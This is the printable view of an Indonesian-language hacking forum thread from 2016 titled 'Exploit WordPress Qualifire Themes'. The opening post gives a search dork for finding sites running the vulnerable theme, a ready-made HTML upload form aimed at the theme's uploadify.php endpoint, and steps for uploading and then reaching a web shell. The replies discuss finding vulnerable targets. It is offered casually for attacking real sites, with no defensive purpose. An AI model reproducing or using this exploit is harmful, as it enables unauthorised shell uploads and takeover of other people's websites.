Exploit WordPress Qualifire Themes

Exploit WordPress Qualifire Themes - Printable Version

+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Web Attack (https://www.backboxindonesia.or.id/forum-15.html)
+--- Thread: Exploit WordPress Qualifire Themes (/thread-78.html)

Exploit WordPress Qualifire Themes - Nue Bhandell - 03-22-2016

Malam Gengs, *nyari bug mulu, kapan nyari pacarnya :D :D :D
iseng2 share exploit lama, kali aja masih crotz awkakw.

yg dh master minggir dlu beb [Image: heart.png]

Play with Me , Baby [Image: tongue.png]

Dork :
inurl:"/wp-content/themes/qualifire"

Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas , tapi kalo 404 not found berarti ikhlasin aja hehehe

[Image: fVtRWaq.png]

Copy Script Upload CSRF:
<form
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>

lalu tinggal upload file/shell ente.
kalo berhasil muncul angka 1

[Image: f8WW5zW.png]

Shell/file Akses: http://www.target.co.li/filemumas

semoga bermanfaat Gengs, maap kalo post cupu [Image: smile.png]

waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk dah UAS awkakw [Image: cool.png]

Bye

SUMUR

RE: Exploit WordPress Qualifire Themes - ./EL-Mueeza_23 - 03-22-2016

masih ada aja yang vuln gan ? >_<

RE: Exploit WordPress Qualifire Themes - Nue Bhandell - 03-22-2016

(03-22-2016, 12:50 PM)./EL-Mueeza_23 Wrote: masih ada aja yang vuln gan ? >_<

vuln , tapi gak verawan bang :D

RE: Exploit WordPress Qualifire Themes - ikkeeeh - 05-28-2016

scan vlun pake apaan om biasanya ?

RE: Exploit WordPress Qualifire Themes - pu12 - 06-01-2016

vuln tapi Invalid.. :D

RE: Exploit WordPress Qualifire Themes - ljpoy7 - 06-01-2016

tadi dapet yang VULN cuman pas manggil shell malah gak muncul :v dapet notice error